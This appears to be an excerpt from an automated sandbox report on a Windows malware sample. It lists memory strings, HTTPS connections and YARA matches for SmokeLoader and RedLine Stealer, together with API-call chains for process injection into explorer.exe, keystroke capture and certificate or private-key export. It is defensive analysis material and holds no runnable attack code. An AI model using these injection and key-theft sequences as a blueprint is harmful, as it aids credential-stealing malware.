    Source: explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
    Source: explorer.exe, 00000002.00000000.2219776484.00000000099AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/e
    Source: explorer.exe, 00000002.00000000.2222332214.000000000C048000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comM
    Source: explorer.exe, 0000000D.00000003.3197507522.0000000002AA3000.00000004.00000020.00020000.00000000.sdmp, 98A5.tmp.13.drString found in binary or memory: https://www.ecosia.org/newtab/
    Source: explorer.exe, 0000000D.00000003.3197507522.0000000002AA3000.00000004.00000020.00020000.00000000.sdmp, 98A5.tmp.13.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
    Source: explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/10-things-rich-people-never-buy-and-you-shouldn-t-ei
    Source: explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA
    Source: explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-
    Source: explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngF
    Source: explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri
    Source: explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-
    Source: explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-h
    Source: explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-qu
    Source: explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation
    Source: explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c
    Source: explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
    Source: explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/us-supplies-ukraine-with-a-million-rounds-of-ammunition-seized-
    Source: explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-
    Source: explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve
    Source: explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
    Source: unknownNetwork traffic detected: HTTP traffic on port 61436 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 61465 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61470
    Source: unknownNetwork traffic detected: HTTP traffic on port 61451 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 61449 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 61445 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61463
    Source: unknownNetwork traffic detected: HTTP traffic on port 61441 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61465
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61467
    Source: unknownNetwork traffic detected: HTTP traffic on port 61437 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 61433 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 61454 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61435
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61436
    Source: unknownNetwork traffic detected: HTTP traffic on port 61450 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61437
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61438
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61439
    Source: unknownNetwork traffic detected: HTTP traffic on port 61448 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 61444 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61433
    Source: unknownNetwork traffic detected: HTTP traffic on port 61440 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61434
    Source: unknownNetwork traffic detected: HTTP traffic on port 61438 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 61463 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 61467 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 61434 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61446
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61447
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61448
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61449
    Source: unknownNetwork traffic detected: HTTP traffic on port 61447 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61440
    Source: unknownNetwork traffic detected: HTTP traffic on port 61443 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61441
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61442
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61444
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61445
    Source: unknownNetwork traffic detected: HTTP traffic on port 61439 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 61470 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 61435 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 61410 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 61452 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61450
    Source: unknownNetwork traffic detected: HTTP traffic on port 61446 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61451
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61452
    Source: unknownNetwork traffic detected: HTTP traffic on port 61442 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61410
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61454
    Source: unknownHTTPS traffic detected: 23.145.40.164:443 -> 192.168.2.6:61410 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61433 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61434 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61435 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61436 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61437 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61438 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61439 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61440 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61441 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61442 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61443 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61444 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61445 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61446 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61447 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61448 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61449 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61450 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61451 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61452 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61454 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61463 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61465 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61467 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61470 version: TLS 1.2

    Key, Mouse, Clipboard, Microphone and Screen Capturing

    barindex
    Yara detected SmokeLoader
    Source: Yara matchFile source: 00000011.00000002.4578892665.00000000005C1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000010.00000002.4579455330.0000000002F01000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 6316, type: MEMORYSTR
    Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 2736, type: MEMORYSTR
    Source: Yara matchFile source: 00000006.00000002.2516872418.00000000006F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000A.00000002.3040798589.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000009.00000002.2777517126.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000002.2233667706.0000000002170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000002.2233749509.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000006.00000002.2516839505.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000009.00000002.2777687762.00000000008D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000A.00000002.3041046973.00000000006D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_0047162B GetKeyboardState,ToUnicode,18_2_0047162B
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeCode function: 11_2_00007FF7CBCA3220 CertGetCertificateContextProperty,CryptAcquireCertificatePrivateKey,CryptGetUserKey,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,CryptExportKey,VirtualProtect,VirtualProtect,CryptAcquireContextA,CryptImportKey,OpenSCManagerA,OpenServiceA,QueryServiceStatusEx,OpenProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,NCryptExportKey,CertOpenStore,CertAddCertificateLinkToStore,CertSetCertificateContextProperty,PFXExportCertStoreEx,PFXExportCertStoreEx,11_2_00007FF7CBCA3220

    System Summary

    barindex
    Malicious sample detected (through community Yara rule)
    Source: 00000000.00000002.2233484367.000000000061F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
    Source: 0000000A.00000002.3040636907.0000000000600000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
    Source: 0000000A.00000002.3041248373.0000000000743000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
    Source: 00000006.00000002.2516872418.00000000006F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
    Source: 0000000A.00000002.3040798589.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
    Source: 00000009.00000002.2777517126.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
    Source: 00000000.00000002.2233359138.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
    Source: 00000006.00000002.2516805210.00000000006B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
    Source: 00000009.00000002.2777599585.00000000006D3000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
    Source: 00000009.00000002.2777432655.0000000000530000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
    Source: 00000000.00000002.2233667706.0000000002170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
    Source: 00000006.00000002.2517016123.00000000007DD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
    Source: 00000000.00000002.2233749509.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
    Source: 00000006.00000002.2516839505.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
    Source: 00000009.00000002.2777687762.00000000008D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
    Source: 0000000A.00000002.3041046973.00000000006D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
    Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTRMatched rule: Semi-Auto-generated - file ironshell.php.txt Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls
    Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 49%
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeCode function: 0_2_00401514 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401514
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeCode function: 0_2_00402F97 RtlCreateUserThread,NtTerminateProcess,0_2_00402F97
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeCode function: 0_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401542
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeCode function: 0_2_00403247 NtTerminateProcess,GetModuleHandleA,0_2_00403247
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeCode function: 0_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401549
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeCode function: 0_2_0040324F NtTerminateProcess,GetModuleHandleA,0_2_0040324F
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeCode function: 0_2_00403256 NtTerminateProcess,GetModuleHandleA,0_2_00403256
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeCode function: 0_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401557
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeCode function: 0_2_0040326C NtTerminateProcess,GetModuleHandleA,0_2_0040326C
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeCode function: 0_2_0040327D NtTerminateProcess,GetModuleHandleA,0_2_0040327D
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeCode function: 0_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004014FE
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeCode function: 0_2_00403290 NtTerminateProcess,GetModuleHandleA,0_2_00403290
    Source: C:\Users\user\AppData\Roaming\jvgasiiCode function: 6_2_00401514 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_00401514
    Source: C:\Users\user\AppData\Roaming\jvgasiiCode function: 6_2_00402F97 RtlCreateUserThread,NtTerminateProcess,6_2_00402F97
    Source: C:\Users\user\AppData\Roaming\jvgasiiCode function: 6_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_00401542
    Source: C:\Users\user\AppData\Roaming\jvgasiiCode function: 6_2_00403247 NtTerminateProcess,GetModuleHandleA,6_2_00403247
    Source: C:\Users\user\AppData\Roaming\jvgasiiCode function: 6_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_00401549
    Source: C:\Users\user\AppData\Roaming\jvgasiiCode function: 6_2_0040324F NtTerminateProcess,GetModuleHandleA,6_2_0040324F
    Source: C:\Users\user\AppData\Roaming\jvgasiiCode function: 6_2_00403256 NtTerminateProcess,GetModuleHandleA,6_2_00403256
    Source: C:\Users\user\AppData\Roaming\jvgasiiCode function: 6_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_00401557
    Source: C:\Users\user\AppData\Roaming\jvgasiiCode function: 6_2_0040326C NtTerminateProcess,GetModuleHandleA,6_2_0040326C
    Source: C:\Users\user\AppData\Roaming\jvgasiiCode function: 6_2_0040327D NtTerminateProcess,GetModuleHandleA,6_2_0040327D
    Source: C:\Users\user\AppData\Roaming\jvgasiiCode function: 6_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_004014FE
    Source: C:\Users\user\AppData\Roaming\jvgasiiCode function: 6_2_00403290 NtTerminateProcess,GetModuleHandleA,6_2_00403290
    Source: C:\Users\user\AppData\Local\Temp\DE97.exeCode function: 9_2_00403103 RtlCreateUserThread,NtTerminateProcess,9_2_00403103
    Source: C:\Users\user\AppData\Local\Temp\DE97.exeCode function: 9_2_004014FB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,9_2_004014FB
    Source: C:\Users\user\AppData\Local\Temp\DE97.exeCode function: 9_2_00401641 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,9_2_00401641
    Source: C:\Users\user\AppData\Local\Temp\DE97.exeCode function: 9_2_00403257 RtlCreateUserThread,NtTerminateProcess,9_2_00403257
    Source: C:\Users\user\AppData\Local\Temp\DE97.exeCode function: 9_2_00401606 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,9_2_00401606
    Source: C:\Users\user\AppData\Local\Temp\DE97.exeCode function: 9_2_00401613 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,9_2_00401613
    Source: C:\Users\user\AppData\Local\Temp\DE97.exeCode function: 9_2_00401627 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,9_2_00401627
    Source: C:\Users\user\AppData\Local\Temp\DE97.exeCode function: 9_2_00403433 GetKeyboardLayoutList,NtMapViewOfSection,NtDuplicateObject,NtQuerySystemInformation,NtOpenKey,strstr,tolower,towlower,9_2_00403433
    Source: C:\Users\user\AppData\Local\Temp\DE97.exeCode function: 9_2_004015FB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,9_2_004015FB
    Source: C:\Users\user\AppData\Roaming\uegasiiCode function: 10_2_00403103 RtlCreateUserThread,NtTerminateProcess,10_2_00403103
    Source: C:\Users\user\AppData\Roaming\uegasiiCode function: 10_2_004014FB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,10_2_004014FB
    Source: C:\Users\user\AppData\Roaming\uegasiiCode function: 10_2_00401641 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,10_2_00401641
    Source: C:\Users\user\AppData\Roaming\uegasiiCode function: 10_2_00403257 RtlCreateUserThread,NtTerminateProcess,10_2_00403257
    Source: C:\Users\user\AppData\Roaming\uegasiiCode function: 10_2_00401606 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,10_2_00401606
    Source: C:\Users\user\AppData\Roaming\uegasiiCode function: 10_2_00401613 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,10_2_00401613
    Source: C:\Users\user\AppData\Roaming\uegasiiCode function: 10_2_00401627 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,10_2_00401627
    Source: C:\Users\user\AppData\Roaming\uegasiiCode function: 10_2_004015FB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,10_2_004015FB
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_00434B92 RtlMoveMemory,NtUnmapViewOfSection,13_2_00434B92
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_004333C3 NtQueryInformationFile,13_2_004333C3
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_0043342B NtQueryObject,NtQueryObject,RtlMoveMemory,13_2_0043342B
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_0043349B CreateFileW,OpenProcess,NtQueryInformationProcess,NtQueryInformationProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,lstrcmpiW,NtQueryObject,StrRChrW,StrRChrW,lstrcmpiW,GetFileSize,SetFilePointer,SetFilePointer,ReadFile,SetFilePointer,CloseHandle,CloseHandle,CloseHandle,13_2_0043349B
    Source: C:\Windows\explorer.exeCode function: 15_2_00E338B0 NtUnmapViewOfSection,15_2_00E338B0
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_02F01016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep,16_2_02F01016
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_02F01819 lstrcmpiA,OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,16_2_02F01819
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_02F01A80 NtCreateSection,NtMapViewOfSection,16_2_02F01A80
    Source: C:\Windows\explorer.exeCode function: 17_2_005C355C NtUnmapViewOfSection,17_2_005C355C
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_00471016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep,18_2_00471016
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_00471B26 NtCreateSection,NtMapViewOfSection,18_2_00471B26
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_004718BF OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,18_2_004718BF
    Source: C:\Windows\explorer.exeCode function: 19_2_00AA370C NtUnmapViewOfSection,19_2_00AA370C
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeCode function: 0_2_00418DF00_2_00418DF0
    Source: C:\Users\user\AppData\Roaming\jvgasiiCode function: 6_2_00418DF06_2_00418DF0
    Source: C:\Users\user\AppData\Local\Temp\DE97.exeCode function: 9_2_004159A09_2_004159A0
    Source: C:\Users\user\AppData\Roaming\uegasiiCode function: 10_2_004159A010_2_004159A0
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeCode function: 11_2_00007FF7CBCA9AC811_2_00007FF7CBCA9AC8
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeCode function: 11_2_00007FF7CBCAB42811_2_00007FF7CBCAB428
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeCode function: 11_2_00007FF7CBCA322011_2_00007FF7CBCA3220
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeCode function: 11_2_00007FF7CBCADC0C11_2_00007FF7CBCADC0C
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeCode function: 11_2_00007FF7CBCAA77811_2_00007FF7CBCAA778
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeCode function: 11_2_00007FF7CBCAA52011_2_00007FF7CBCAA520
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeCode function: 11_2_00007FF7CBCA213C11_2_00007FF7CBCA213C
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_0043219813_2_00432198
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_0043C2F913_2_0043C2F9
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_0044B35C13_2_0044B35C
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_0048443813_2_00484438
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_0044B97E13_2_0044B97E
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_00436E6A13_2_00436E6A
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_00455F0813_2_00455F08
    Source: C:\Windows\explorer.exeCode function: 15_2_00E31E2015_2_00E31E20
    Source: C:\Windows\explorer.exeCode function: 17_2_005C205417_2_005C2054
    Source: C:\Windows\explorer.exeCode function: 17_2_005C286017_2_005C2860
    Source: C:\Windows\explorer.exeCode function: 19_2_00AA2A0419_2_00AA2A04
